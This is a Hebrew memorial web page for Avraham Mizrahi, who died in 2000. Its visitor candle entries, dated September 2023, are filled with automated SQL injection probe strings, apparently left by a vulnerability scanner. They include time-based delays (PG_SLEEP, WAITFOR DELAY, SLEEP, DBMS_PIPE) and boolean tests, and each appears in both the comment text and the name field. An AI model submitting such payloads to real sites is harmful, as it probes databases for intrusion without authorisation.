אברהם מזרחי ז"ל

נלקח/ה לבית עולמו/ה ביום שני, 15 במאי 2000 י' אייר תש"ס


הדליקו נר וכיתבו את אשר על ליבכם
הדלק נר לזכרו

@@NkkZF
1, ספטמבר 2023
1����%2527%2522
1, ספטמבר 2023
1'"
1, ספטמבר 2023
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1, ספטמבר 2023
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1, ספטמבר 2023
WMW0lo3J')) OR 77=(SELECT 77 FROM PG_SLEEP(15))--
1, ספטמבר 2023
nL0Z3lMv') OR 712=(SELECT 712 FROM PG_SLEEP(15))--
1, ספטמבר 2023
E5sExk2a' OR 940=(SELECT 940 FROM PG_SLEEP(15))--
1, ספטמבר 2023
-1)) OR 700=(SELECT 700 FROM PG_SLEEP(15))--
1, ספטמבר 2023
-5) OR 112=(SELECT 112 FROM PG_SLEEP(15))--
1, ספטמבר 2023
-5 OR 874=(SELECT 874 FROM PG_SLEEP(15))--
1, ספטמבר 2023
bwly6rtw')); waitfor delay '0:0:15' --
1, ספטמבר 2023
YemT1Bws'); waitfor delay '0:0:15' --
1, ספטמבר 2023
f10e3E9C'; waitfor delay '0:0:15' --
1, ספטמבר 2023
1 waitfor delay '0:0:15' --
1, ספטמבר 2023
-1)); waitfor delay '0:0:15' --
1, ספטמבר 2023
-1); waitfor delay '0:0:15' --
1, ספטמבר 2023
-1; waitfor delay '0:0:15' --
1, ספטמבר 2023
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1, ספטמבר 2023
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1, ספטמבר 2023
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1, ספטמבר 2023
if(now()=sysdate(),sleep(15),0)
1, ספטמבר 2023
-1" OR 3*2>(0+5+723-723) --
1, ספטמבר 2023
-1" OR 3*2<(0+5+723-723) --
1, ספטמבר 2023
-1" OR 3+723-723-1=0+0+0+1 --
1, ספטמבר 2023
-1" OR 2+723-723-1=0+0+0+1 --
1, ספטמבר 2023
-1' OR 3*2>(0+5+830-830) or 'adxgU6s2'='
1, ספטמבר 2023
-1' OR 3*2<(0+5+830-830) or 'adxgU6s2'='
1, ספטמבר 2023
-1' OR 3+830-830-1=0+0+0+1 or 'adxgU6s2'='
1, ספטמבר 2023
-1' OR 2+830-830-1=0+0+0+1 or 'adxgU6s2'='
1, ספטמבר 2023
-1' OR 3*2>(0+5+133-133) --
1, ספטמבר 2023
-1' OR 3*2<(0+5+133-133) --
1, ספטמבר 2023
-1' OR 3+133-133-1=0+0+0+1 --
1, ספטמבר 2023
-1' OR 2+133-133-1=0+0+0+1 --
1, ספטמבר 2023
-1 OR 3*2>(0+5+408-408)
1, ספטמבר 2023
-1 OR 3*2<(0+5+408-408)
1, ספטמבר 2023
-1 OR 3+408-408-1=0+0+0+1
1, ספטמבר 2023
-1 OR 2+408-408-1=0+0+0+1
1, ספטמבר 2023
-1 OR 3*2>(0+5+760-760) --
1, ספטמבר 2023
-1 OR 3*2<(0+5+760-760) --
1, ספטמבר 2023
-1 OR 3+760-760-1=0+0+0+1 --
1, ספטמבר 2023
-1 OR 2+760-760-1=0+0+0+1 --
1, ספטמבר 2023
1
1, ספטמבר 2023
1
1, ספטמבר 2023
1
@@FuAtG, ספטמבר 2023
1
1����%2527%2522, ספטמבר 2023
1
1'", ספטמבר 2023
1
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||', ספטמבר 2023
1
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15), ספטמבר 2023
1
3DMUujFq')) OR 50=(SELECT 50 FROM PG_SLEEP(15))--, ספטמבר 2023
1
nKAIu3ZA') OR 758=(SELECT 758 FROM PG_SLEEP(15))--, ספטמבר 2023
1
ijDxG786' OR 726=(SELECT 726 FROM PG_SLEEP(15))--, ספטמבר 2023
1
-1)) OR 397=(SELECT 397 FROM PG_SLEEP(15))--, ספטמבר 2023
1
-5) OR 51=(SELECT 51 FROM PG_SLEEP(15))--, ספטמבר 2023
1
-5 OR 651=(SELECT 651 FROM PG_SLEEP(15))--, ספטמבר 2023
1
X4POmS4R')); waitfor delay '0:0:15' -- , ספטמבר 2023
1
72uOy2dO'); waitfor delay '0:0:15' -- , ספטמבר 2023
1
0pRSouxb'; waitfor delay '0:0:15' -- , ספטמבר 2023
1
1 waitfor delay '0:0:15' -- , ספטמבר 2023
1
-1)); waitfor delay '0:0:15' -- , ספטמבר 2023
1
-1); waitfor delay '0:0:15' -- , ספטמבר 2023
1
-1; waitfor delay '0:0:15' -- , ספטמבר 2023
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/, ספטמבר 2023
1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z, ספטמבר 2023
1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z, ספטמבר 2023
1
if(now()=sysdate(),sleep(15),0), ספטמבר 2023
1
-1" OR 3*2>(0+5+537-537) -- , ספטמבר 2023
1
-1" OR 3*2<(0+5+537-537) -- , ספטמבר 2023
1
-1" OR 3+537-537-1=0+0+0+1 -- , ספטמבר 2023
1
-1" OR 2+537-537-1=0+0+0+1 -- , ספטמבר 2023
1
-1' OR 3*2>(0+5+592-592) or 'ljfP1LLF'=', ספטמבר 2023
1
-1' OR 3*2<(0+5+592-592) or 'ljfP1LLF'=', ספטמבר 2023
1
-1' OR 3+592-592-1=0+0+0+1 or 'ljfP1LLF'=', ספטמבר 2023
1
-1' OR 2+592-592-1=0+0+0+1 or 'ljfP1LLF'=', ספטמבר 2023
1
-1' OR 3*2>(0+5+482-482) -- , ספטמבר 2023
1
-1' OR 3*2<(0+5+482-482) -- , ספטמבר 2023
1
-1' OR 3+482-482-1=0+0+0+1 -- , ספטמבר 2023
1
-1' OR 2+482-482-1=0+0+0+1 -- , ספטמבר 2023
1
-1 OR 3*2>(0+5+551-551), ספטמבר 2023
1
-1 OR 3*2<(0+5+551-551), ספטמבר 2023
1
-1 OR 3+551-551-1=0+0+0+1, ספטמבר 2023
1
-1 OR 2+551-551-1=0+0+0+1, ספטמבר 2023
1
-1 OR 3*2>(0+5+648-648) -- , ספטמבר 2023
1
-1 OR 3*2<(0+5+648-648) -- , ספטמבר 2023
1
-1 OR 3+648-648-1=0+0+0+1 -- , ספטמבר 2023
1
-1 OR 2+648-648-1=0+0+0+1 -- , ספטמבר 2023
1
1, ספטמבר 2023
1
1, ספטמבר 2023
1
1, ספטמבר 2023